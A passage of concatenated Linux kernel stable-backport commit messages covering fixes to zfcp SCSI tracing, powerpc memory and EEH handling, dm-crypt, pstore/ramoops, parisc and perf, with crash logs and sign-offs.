GS uses an open WKA port handle and ELS just a D_ID, and
only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req.
To cover both cases, add a new field to zfcp_fsf_ct_els
and fill it in on request to use in SAN response trace.
Strictly speaking the D_ID on SAN response is the FC frame's S_ID.
We don't need a field for the other end which is always us.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a8 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Fixes: 7c7dc19681 ("[SCSI] zfcp: Simplify handling of ct and els requests")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d27a7cb919 upstream.
Since commit a54ca0f62f
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
HBA records no longer contain WWPN, D_ID, or LUN
to reduce duplicate information which is already in REC records.
In contrast to "regular" target ports, we don't use recovery to open
WKA ports such as directory/nameserver, so we don't get REC records.
Therefore, introduce pseudo REC running records without any
actual recovery action but including D_ID of WKA port on open/close.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 35f040df97 upstream.
While retaining the actual filtering according to trace level,
the following commits started to write such filtered records
with a hardcoded record level of 1 instead of the actual record level:
commit 250a1352b9
("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
commit a54ca0f62f
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Now we can distinguish written records again for offline level filtering.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 250a1352b9 ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
Fixes: a54ca0f62f ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4eeaa4f3f1 upstream.
On a successful end of reopen port forced,
zfcp_erp_strategy_followup_success() re-uses the port erp_action
and the subsequent zfcp_erp_action_cleanup() now
sees ZFCP_ERP_SUCCEEDED with
erp_action->action==ZFCP_ERP_ACTION_REOPEN_PORT
instead of ZFCP_ERP_ACTION_REOPEN_PORT_FORCED
but must not perform zfcp_scsi_schedule_rport_register().
We can detect this because the fresh port reopen erp_action
is in its very first step ZFCP_ERP_STEP_UNINITIALIZED.
Otherwise this opens a time window with unblocked rport
(until the followup port reopen recovery would block it again).
If a scsi_cmnd timeout occurs during this time window
fc_timed_out() cannot work as desired and such command
would indeed time out and trigger scsi_eh. This prevents
a clean and timely path failover.
This should not happen if the path issue can be recovered
on FC transport layer such as path issues involving RSCNs.
Also, unnecessary and repeated DID_IMM_RETRY for pending and
undesired new requests occur because internally zfcp still
has its zfcp_port blocked.
As follow-on errors with scsi_eh, it can cause,
in the worst case, permanently lost paths due to one of:
sd <scsidev>: [<scsidisk>] Medium access timeout failure. Offlining disk!
sd <scsidev>: Device offlined - not ready after error recovery
For fix validation and to aid future debugging with other recoveries
we now also trace (un)blocking of rports.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 5767620c38 ("[SCSI] zfcp: Do not unblock rport from REOPEN_PORT_FORCED")
Fixes: a2fa0aede0 ("[SCSI] zfcp: Block FC transport rports early on errors")
Fixes: 5f852be9e1 ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI")
Fixes: 338151e066 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable")
Fixes: 3859f6a248 ("[PATCH] zfcp: add rports to enable scsi_add_device to work again")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 70369f8e15 upstream.
In the hardware data router case, introduced with kernel 3.2
commit 86a9668a8d ("[SCSI] zfcp: support for hardware data router")
the ELS/GS request&response length needs to be initialized
as in the chained SBAL case.
Otherwise, the FCP channel rejects ELS requests with
FSF_REQUEST_SIZE_TOO_LARGE.
Such ELS requests can be issued by user space through BSG / HBA API,
or zfcp itself uses ADISC ELS for remote port link test on RSCN.
The latter can cause a short path outage due to
unnecessary remote target port recovery because the always
failing ADISC cannot detect extremely short path interruptions
beyond the local FCP channel.
Below example is decoded with zfcpdbf from s390-tools:
Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_san_req+0408
Record id : 1
Tag : fssels1
Request id : 0x<reqid>
Destination ID : 0x00<target d_id>
Payload info : 52000000 00000000 <our wwpn > [ADISC]
<our wwnn > 00<s_id> 00000000
00000000 00000000 00000000 00000000
Timestamp : ...
Area : HBA
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_hba_fsf_res+0740
Record id : 1
Tag : fs_ferr
Request id : 0x<reqid>
Request status : 0x00000010
FSF cmnd : 0x0000000b [FSF_QTCB_SEND_ELS]
FSF sequence no: 0x...
FSF issued : ...
FSF stat : 0x00000061 [FSF_REQUEST_SIZE_TOO_LARGE]
FSF stat qual : 00000000 00000000 00000000 00000000
Prot stat : 0x00000100
Prot stat qual : 00000000 00000000 00000000 00000000
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 86a9668a8d ("[SCSI] zfcp: support for hardware data router")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bd77befa5b upstream.
For an NPIV-enabled FCP device, zfcp can erroneously show
"NPort (fabric via point-to-point)" instead of "NPIV VPORT"
for the port_type sysfs attribute of the corresponding
fc_host.
s390-tools that can be affected are dbginfo.sh and ziomon.
zfcp_fsf_exchange_config_evaluate() ignores
fsf_qtcb_bottom_config.connection_features indicating NPIV
and only sets fc_host_port_type to FC_PORTTYPE_NPORT if
fsf_qtcb_bottom_config.fc_topology is FSF_TOPO_FABRIC.
Only the independent zfcp_fsf_exchange_port_evaluate()
evaluates connection_features to overwrite fc_host_port_type
to FC_PORTTYPE_NPIV in case of NPIV.
Code was introduced with upstream kernel 2.6.30
commit 0282985da5
("[SCSI] zfcp: Report fc_host_port_type as NPIV").
This works during FCP device recovery (such as set online)
because it performs FSF_QTCB_EXCHANGE_CONFIG_DATA followed by
FSF_QTCB_EXCHANGE_PORT_DATA in sequence.
However, the zfcp-specific scsi host sysfs attributes
"requests", "megabytes", or "seconds_active" trigger only
zfcp_fsf_exchange_config_evaluate() resetting fc_host
port_type to FC_PORTTYPE_NPORT despite NPIV.
The zfcp-specific scsi host sysfs attribute "utilization"
triggers only zfcp_fsf_exchange_port_evaluate() correcting
the fc_host port_type again in case of NPIV.
Evaluate fsf_qtcb_bottom_config.connection_features
in zfcp_fsf_exchange_config_evaluate() where it belongs to.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 0282985da5 ("[SCSI] zfcp: Report fc_host_port_type as NPIV")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2365418879 upstream.
When Fastmap is used we can face here an -EBADMSG
since Fastmap cannot know about unmaps.
If the erasure was interrupted the PEB may show ECC
errors and UBI would go to ro-mode as it assumes
that the PEB was check during attach time, which is
not the case with Fastmap.
Fixes: dbb7d2a88d ("UBI: Add fastmap core")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 681cc36083 upstream.
Avoid that mapping an sg-list in which the first element has a
non-zero offset triggers an infinite loop when using FMR. This
patch makes the FMR mapping code similar to that of ib_sg_to_pages().
Note: older Mellanox HCAs do not support non-zero offsets for FMR.
See also commit 8c4037b501 ("IB/srp: always avoid non-zero offsets
into an FMR").
Reported-by: Alex Estrin <alex.estrin@intel.com>
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 08bf75ba85 upstream.
In commit 2b4e3ad8f5 ("powerpc/mm/hash64: Don't test for machine type
to detect HEA special case") we changed the logic in might_have_hea()
to check FW_FEATURE_SPLPAR rather than machine_is(pseries).
However the check was incorrectly negated, leading to crashes on
machines with HEA adapters, such as:
mm: Hashing failure ! EA=0xd000080080004040 access=0x800000000000000e current=NetworkManager
trap=0x300 vsid=0x13d349c ssize=1 base psize=2 psize 2 pte=0xc0003cc033e701ae
Unable to handle kernel paging request for data at address 0xd000080080004040
Call Trace:
.ehea_create_cq+0x148/0x340 [ehea] (unreliable)
.ehea_up+0x258/0x1200 [ehea]
.ehea_open+0x44/0x1a0 [ehea]
...
Fix it by removing the negation.
Fixes: 2b4e3ad8f5 ("powerpc/mm/hash64: Don't test for machine type to detect HEA special case")
Reported-by: Denis Kirjanov <kda@linux-powerpc.org>
Reported-by: Jan Stancek <jstancek@redhat.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 05af40e885 upstream.
This commit fixes a stack corruption in the pseries specific code dealing
with the huge pages.
In __pSeries_lpar_hugepage_invalidate() the buffer used to pass arguments
to the hypervisor is not large enough. This leads to a stack corruption
where a previously saved register could be corrupted leading to unexpected
result in the caller, like the following panic:
Oops: Kernel access of bad area, sig: 11 [#1]
SMP NR_CPUS=2048 NUMA pSeries
Modules linked in: virtio_balloon ip_tables x_tables autofs4
virtio_blk 8139too virtio_pci virtio_ring 8139cp virtio
CPU: 11 PID: 1916 Comm: mmstress Not tainted 4.8.0 #76
task: c000000005394880 task.stack: c000000005570000
NIP: c00000000027bf6c LR: c00000000027bf64 CTR: 0000000000000000
REGS: c000000005573820 TRAP: 0300 Not tainted (4.8.0)
MSR: 8000000000009033 <SF,EE,ME,IR,DR,RI,LE> CR: 84822884 XER: 20000000
CFAR: c00000000010a924 DAR: 420000000014e5e0 DSISR: 40000000 SOFTE: 1
GPR00: c00000000027bf64 c000000005573aa0 c000000000e02800 c000000004447964
GPR04: c00000000404de18 c000000004d38810 00000000042100f5 00000000f5002104
GPR08: e0000000f5002104 0000000000000001 042100f5000000e0 00000000042100f5
GPR12: 0000000000002200 c00000000fe02c00 c00000000404de18 0000000000000000
GPR16: c1ffffffffffe7ff 00003fff62000000 420000000014e5e0 00003fff63000000
GPR20: 0008000000000000 c0000000f7014800 0405e600000000e0 0000000000010000
GPR24: c000000004d38810 c000000004447c10 c00000000404de18 c000000004447964
GPR28: c000000005573b10 c000000004d38810 00003fff62000000 420000000014e5e0
NIP [c00000000027bf6c] zap_huge_pmd+0x4c/0x470
LR [c00000000027bf64] zap_huge_pmd+0x44/0x470
Call Trace:
[c000000005573aa0] [c00000000027bf64] zap_huge_pmd+0x44/0x470 (unreliable)
[c000000005573af0] [c00000000022bbd8] unmap_page_range+0xcf8/0xed0
[c000000005573c30] [c00000000022c2d4] unmap_vmas+0x84/0x120
[c000000005573c80] [c000000000235448] unmap_region+0xd8/0x1b0
[c000000005573d80] [c0000000002378f0] do_munmap+0x2d0/0x4c0
[c000000005573df0] [c000000000237be4] SyS_munmap+0x64/0xb0
[c000000005573e30] [c000000000009560] system_call+0x38/0x108
Instruction dump:
fbe1fff8 fb81ffe0 7c7f1b78 7ca32b78 7cbd2b78 f8010010 7c9a2378 f821ffb1
7cde3378 4bfffea9 7c7b1b79 41820298 <e87f0000> 48000130 7fa5eb78 7fc4f378
Most of the time, the bug is surfacing in a caller up in the stack from
__pSeries_lpar_hugepage_invalidate() which is quite confusing.
This bug is pending since v3.11 but was hidden if a caller of the
caller of __pSeries_lpar_hugepage_invalidate() has pushed the corruped
register (r18 in this case) in the stack and is not using it until
restoring it. GCC 6.2.0 seems to raise it more frequently.
This commit also change the definition of the parameter buffer in
pSeries_lpar_flush_hash_range() to rely on the global define
PLPAR_HCALL9_BUFSIZE (no functional change here).
Fixes: 1a5272866f ("powerpc: Optimize hugepage invalidate")
Signed-off-by: Laurent Dufour <ldufour@linux.vnet.ibm.com>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Acked-by: Balbir Singh <bsingharora@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1a34439e5a upstream.
Debugging a data corruption issue with virtio-net/vhost-net led to
the observation that __copy_tofrom_user was occasionally returning
a value 16 larger than it should. Since the return value from
__copy_tofrom_user is the number of bytes not copied, this means
that __copy_tofrom_user can occasionally return a value larger
than the number of bytes it was asked to copy. In turn this can
cause higher-level copy functions such as copy_page_to_iter_iovec
to corrupt memory by copying data into the wrong memory locations.
It turns out that the failing case involves a fault on the store
at label 79, and at that point the first unmodified byte of the
destination is at R3 + 16. Consequently the exception handler
for that store needs to add 16 to R3 before using it to work out
how many bytes were not copied, but in this one case it was not
adding the offset to R3. To fix it, this moves the label 179 to
the point where we add 16 to R3. I have checked manually all the
exception handlers for the loads and stores in this code and the
rest of them are correct (it would be excellent to have an
automated test of all the exception cases).
This bug has been present since this code was initially
committed in May 2002 to Linux version 2.5.20.
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d5a1e42cb4 upstream.
For hugetlb to work with 4K page size, we need MAX_ORDER to be 13 or
more. When switching from a 64K page size to 4K linux page size using
make oldconfig, we end up with a CONFIG_FORCE_MAX_ZONEORDER value of 9.
This results in a 16M hugepage beiing considered as a gigantic huge page
which in turn results in failure to setup hugepages if gigantic hugepage
support is not enabled.
This also results in kernel crash with 4K radix configuration. We
hit the below BUG_ON on radix:
kernel BUG at mm/huge_memory.c:364!
Oops: Exception in kernel mode, sig: 5 [#1]
SMP NR_CPUS=2048 NUMA PowerNV
CPU: 0 PID: 1 Comm: swapper/0 Not tainted 4.8.0-rc1-00006-gbae9cc6 #1
task: c0000000f1af8000 task.stack: c0000000f1aec000
NIP: c000000000c5fa0c LR: c000000000c5f9d8 CTR: c000000000c5f9a4
REGS: c0000000f1aef920 TRAP: 0700 Not tainted (4.8.0-rc1-00006-gbae9cc6)
MSR: 9000000102029033 <SF,HV,VEC,EE,ME,IR,DR,RI,LE,TM[E]> CR: 24000844 XER: 00000000
CFAR: c000000000c5f9e0 SOFTE: 1
....
NIP [c000000000c5fa0c] hugepage_init+0x68/0x238
LR [c000000000c5f9d8] hugepage_init+0x34/0x238
Fixes: a7ee539584 ("powerpc/Kconfig: Update config option based on page size")
Reported-by: Santhosh <santhog4@linux.vnet.ibm.com>
Signed-off-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Acked-by: Balbir Singh <bsingharora@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a7032132d7 upstream.
The hub diag-data type is filled with big-endian data by OPAL call
opal_pci_get_hub_diag_data(). We need convert it to CPU-endian value
before using it. The issue is reported by sparse as pointed by Michael
Ellerman:
eeh-powernv.c:1309:21: warning: restricted __be16 degrades to integer
This converts hub diag-data type to CPU-endian before using it in
pnv_eeh_get_and_dump_hub_diag().
Fixes: 2a485ad7c8 ("powerpc/powernv: Drop PHB operation next_error()")
Suggested-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Russell Currey <ruscur@russell.cc>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 04fec21c06 upstream.
eeh_pe_bus_get() can return NULL if a PCI bus isn't found for a given PE.
Some callers don't check this, and can cause a null pointer dereference
under certain circumstances.
Fix this by checking NULL everywhere eeh_pe_bus_get() is called.
Fixes: 8a6b1bc70d ("powerpc/eeh: EEH core to handle special event")
Signed-off-by: Russell Currey <ruscur@russell.cc>
Reviewed-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d63e51b31e upstream.
The PE number (@frozen_pe_no), filled by opal_pci_next_error() is in
big-endian format. It should be converted to CPU-endian before it is
passed to opal_pci_eeh_freeze_clear() when clearing the frozen state if
the PE is invalid one. As Michael Ellerman pointed out, the issue is
also detected by sparse:
eeh-powernv.c:1541:41: warning: incorrect type in argument 2 (different base types)
This passes CPU-endian PE number to opal_pci_eeh_freeze_clear() and it
should be part of commit <0f36db77643b> ("powerpc/eeh: Fix wrong printed
PE number"), which was merged to 4.3 kernel.
Fixes: 71b540adff ("powerpc/powernv: Don't escalate non-existing frozen PE")
Suggested-by: Paul Mackerras <paulus@samba.org>
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Russell Currey <ruscur@russell.cc>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5045ea3737 upstream.
__kernel_get_syscall_map() and __kernel_clock_getres() use cmpli to
check if the passed in pointer is non zero. cmpli maps to a 32 bit
compare on binutils, so we ignore the top 32 bits.
A simple test case can be created by passing in a bogus pointer with
the bottom 32 bits clear. Using a clk_id that is handled by the VDSO,
then one that is handled by the kernel shows the problem:
printf("%d\n", clock_getres(CLOCK_REALTIME, (void *)0x100000000));
printf("%d\n", clock_getres(CLOCK_BOOTTIME, (void *)0x100000000));
And we get:
0
-1
The bigger issue is if we pass a valid pointer with the bottom 32 bits
clear, in this case we will return success but won't write any data
to the pointer.
I stumbled across this issue because the LLVM integrated assembler
doesn't accept cmpli with 3 arguments. Fix this by converting them to
cmpldi.
Fixes: a7f290dad3 ("[PATCH] powerpc: Merge vdso's and add vdso support to 32 bits kernel")
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b42d9023a3 upstream.
In commit 31cdd0c39c ("powerpc/xmon: Fix SPR read/write commands and
add command to dump SPRs") I added two uses of the "ld" instruction in
spr_access.S. "ld" is a 64-bit instruction, so shouldn't be used on
32-bit CPUs.
Replace it with PPC_LL which is a macro that gives us either "ld" or
"lwz" depending on whether we're 64 or 32-bit.
Fixes: 31cdd0c39c ("powerpc/xmon: Fix SPR read/write commands and add command to dump SPRs")
Reported-by: John Paul Adrian Glaubitz <glaubitz@physik.fu-berlin.de>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f659b10087 upstream.
As the documentation for kthread_stop() says, "if threadfn() may call
do_exit() itself, the caller must ensure task_struct can't go away".
dm-crypt does not ensure this and therefore crashes when crypt_dtr()
calls kthread_stop(). The crash is trivially reproducible by adding a
delay before the call to kthread_stop() and just opening and closing a
dm-crypt device.
general protection fault: 0000 [#1] PREEMPT SMP
CPU: 0 PID: 533 Comm: cryptsetup Not tainted 4.8.0-rc7+ #7
task: ffff88003bd0df40 task.stack: ffff8800375b4000
RIP: 0010: kthread_stop+0x52/0x300
Call Trace:
crypt_dtr+0x77/0x120
dm_table_destroy+0x6f/0x120
__dm_destroy+0x130/0x250
dm_destroy+0x13/0x20
dev_remove+0xe6/0x120
? dev_suspend+0x250/0x250
ctl_ioctl+0x1fc/0x530
? __lock_acquire+0x24f/0x1b10
dm_ctl_ioctl+0x13/0x20
do_vfs_ioctl+0x91/0x6a0
? ____fput+0xe/0x10
? entry_SYSCALL_64_fastpath+0x5/0xbd
? trace_hardirqs_on_caller+0x151/0x1e0
SyS_ioctl+0x41/0x70
entry_SYSCALL_64_fastpath+0x1f/0xbd
This problem was introduced by bcbd94ff48 ("dm crypt: fix a possible
hang due to race condition on exit").
Looking at the description of that patch (excerpted below), it seems
like the problem it addresses can be solved by just using
set_current_state instead of __set_current_state, since we obviously
need the memory barrier.
| dm crypt: fix a possible hang due to race condition on exit
|
| A kernel thread executes __set_current_state(TASK_INTERRUPTIBLE),
| __add_wait_queue, spin_unlock_irq and then tests kthread_should_stop().
| It is possible that the processor reorders memory accesses so that
| kthread_should_stop() is executed before __set_current_state(). If
| such reordering happens, there is a possible race on thread
| termination: [...]
So this patch just reverts the aforementioned patch and changes the
__set_current_state(TASK_INTERRUPTIBLE) to set_current_state(...). This
fixes the crash and should also fix the potential hang.
Fixes: bcbd94ff48 ("dm crypt: fix a possible hang due to race condition on exit")
Cc: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f10e06b744 upstream.
If pg_init_retries is set and a request is queued against a multipath
device with all underlying block device request_queues in the "dying"
state then an infinite loop is triggered because activate_path() never
succeeds and hence never calls pg_init_done().
This change avoids that device removal triggers an infinite loop by
failing the activate_path() which causes the "dying" path to be failed.
Reported-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9dbeaeabac upstream.
Every call of queue_flag_clear_unlocked() after block device
initialization has finished is wrong if blk_cleanup_queue() can be
called concurrently. Convert queue_flag_clear_unlocked() into
queue_flag_clear() and protect it by the block layer queue lock.
Also, factor out dm_mq_start_queue().
Reported-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8dc23658b7 upstream.
dm_resume() will return success (0) rather than -EINVAL if
!dm_suspended_md() upon retry within dm_resume().
Reset the error code at the start of dm_resume()'s retry loop.
Also, remove a useless assignment at the end of dm_resume().
Fixes: ffcc393641 ("dm: enhance internal suspend and resume interface")
Signed-off-by: Minfei Huang <mnghuan@gmail.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3bccbe20f6 upstream.
The MTC packet provides a 8-bit slice of CTC which is related to TSC by
the TMA packet, however the TMA packet only provides the lower 16 bits
of CTC. If mtc_shift > 8 then some of the MTC bits are not in the CTC
provided by the TMA packet. Fix-up the last_mtc calculated from the TMA
packet by copying the missing bits from the current MTC assuming the
least difference between the two, and that the current MTC comes after
last_mtc.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Link: http://lkml.kernel.org/r/1475062896-22274-2-git-send-email-adrian.hunter@intel.com
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 810c398bc0 upstream.
Fix occasional decoder errors decoding trace data collected in snapshot
mode.
Snapshot mode can take successive snapshots of trace which might overlap.
The decoder checks whether there is an overlap but only looks at the
current and previous buffer. However buffers that do not contain
synchronization (i.e. PSB) packets cannot be decoded or used for overlap
checking. That means the decoder actually needs to check overlaps between
the current buffer and the previous buffer that contained usable data.
Make that change.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Masami Hiramatsu <mhiramat@kernel.org>
Cc: Mathieu Poirier <mathieu.poirier@linaro.org>
Link: http://lkml.kernel.org/r/1474641528-18776-10-git-send-email-adrian.hunter@intel.com
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d771fdf941 upstream.
The ramoops buffer may be mapped as either I/O memory or uncached
memory. On ARM64, this results in a device-type (strongly-ordered)
mapping. Since unnaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.
Signed-off-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Puneet Kumar <puneetster@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7e75678d23 upstream.
persistent_ram_update uses vmap / iomap based on whether the buffer is in
memory region or reserved region. However, both map it as non-cacheable
memory. For armv8 specifically, non-cacheable mapping requests use a
memory type that has to be accessed aligned to the request size. memcpy()
doesn't guarantee that.
Signed-off-by: Furquan Shaikh <furquan@google.com>
Signed-off-by: Enric Balletbo Serra <enric.balletbo@collabora.com>
Reviewed-by: Aaron Durbin <adurbin@chromium.org>
Reviewed-by: Olof Johansson <olofj@chromium.org>
Tested-by: Furquan Shaikh <furquan@chromium.org>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d5a9bf0b38 upstream.
I have here a FPGA behind PCIe which exports SRAM which I use for
pstore. Now it seems that the FPGA no longer supports cmpxchg based
updates and writes back 0xff…ff and returns the same. This leads to
crash during crash rendering pstore useless.
Since I doubt that there is much benefit from using cmpxchg() here, I am
dropping this atomic access and use the spinlock based version.
Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Rabin Vincent <rabinv@axis.com>
Tested-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
[kees: remove "_locked" suffix since it's the only option now]
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4407de74df upstream.
A basic rmmod ramoops segfaults. Let's see why.
Since commit 34f0ec82e0 ("pstore: Correct the max_dump_cnt clearing of
ramoops") sets ->max_dump_cnt to zero before looping over ->przs but we
didn't use it before that either.
And since commit ee1d267423 ("pstore: add pstore unregister") we free
that memory on rmmod.
But even then, we looped until a NULL pointer or ERR. I don't see where
it is ensured that the last member is NULL. Let's try this instead:
simply error recovery and free. Clean up in error case where resources
were allocated. And then, in the free path, rely on ->max_dump_cnt in
the free path.
Cc: Anton Vorontsov <anton@enomsg.org>
Cc: Colin Cross <ccross@android.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Namhyung Kim <namhyung@kernel.org>
Acked-by: Namhyung Kim <namhyung@kernel.org>
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 65bf34f595 upstream.
Increase the initial kernel default page mapping size for 64-bit kernels to
64 MB and for 32-bit kernels to 32 MB.
Due to the additional support of ftrace, tracepoint and huge pages the kernel
size can exceed the sizes we used up to now.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f8850abb7b upstream.
Architecturally we need to keep __gp below 0x1000000.
But because of ftrace and tracepoint support, the RO_DATA_SECTION now gets much
bigger than it was before. By moving the linkage tables before RO_DATA_SECTION
we can avoid that __gp gets positioned at a too high address.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 92420bd0d0 upstream.
The config option HAVE_UNSTABLE_SCHED_CLOCK is set automatically when compiling
for SMP. There is no need to clear the stable-clock flag via
clear_sched_clock_stable() when starting secondary CPUs, and even worse,
clearing it triggers wrong self-detected CPU stall warnings on 64bit Mako
machines.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 690d097c00 upstream.
Increase the initial kernel default page mapping size for SMP kernels to 32MB
and add a runtime check which panics early if the kernel is bigger than the
initial mapping size.
This fixes boot crashes of 32bit SMP kernels. Due to the introduction of huge
page support in kernel 4.4 and it's required initial kernel layout in memory, a
32bit SMP kernel usually got bigger (in layout, not size) than 16MB.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f9f4872df6 upstream.
This is a requirement that MSR MSR_PM_ENABLE must be set to 0x01 before
reading MSR_HWP_CAPABILITIES on a given CPU. If cpufreq init() is
scheduled on a CPU which is not same as policy->cpu or migrates to a
different CPU before calling msr read for MSR_HWP_CAPABILITIES, it
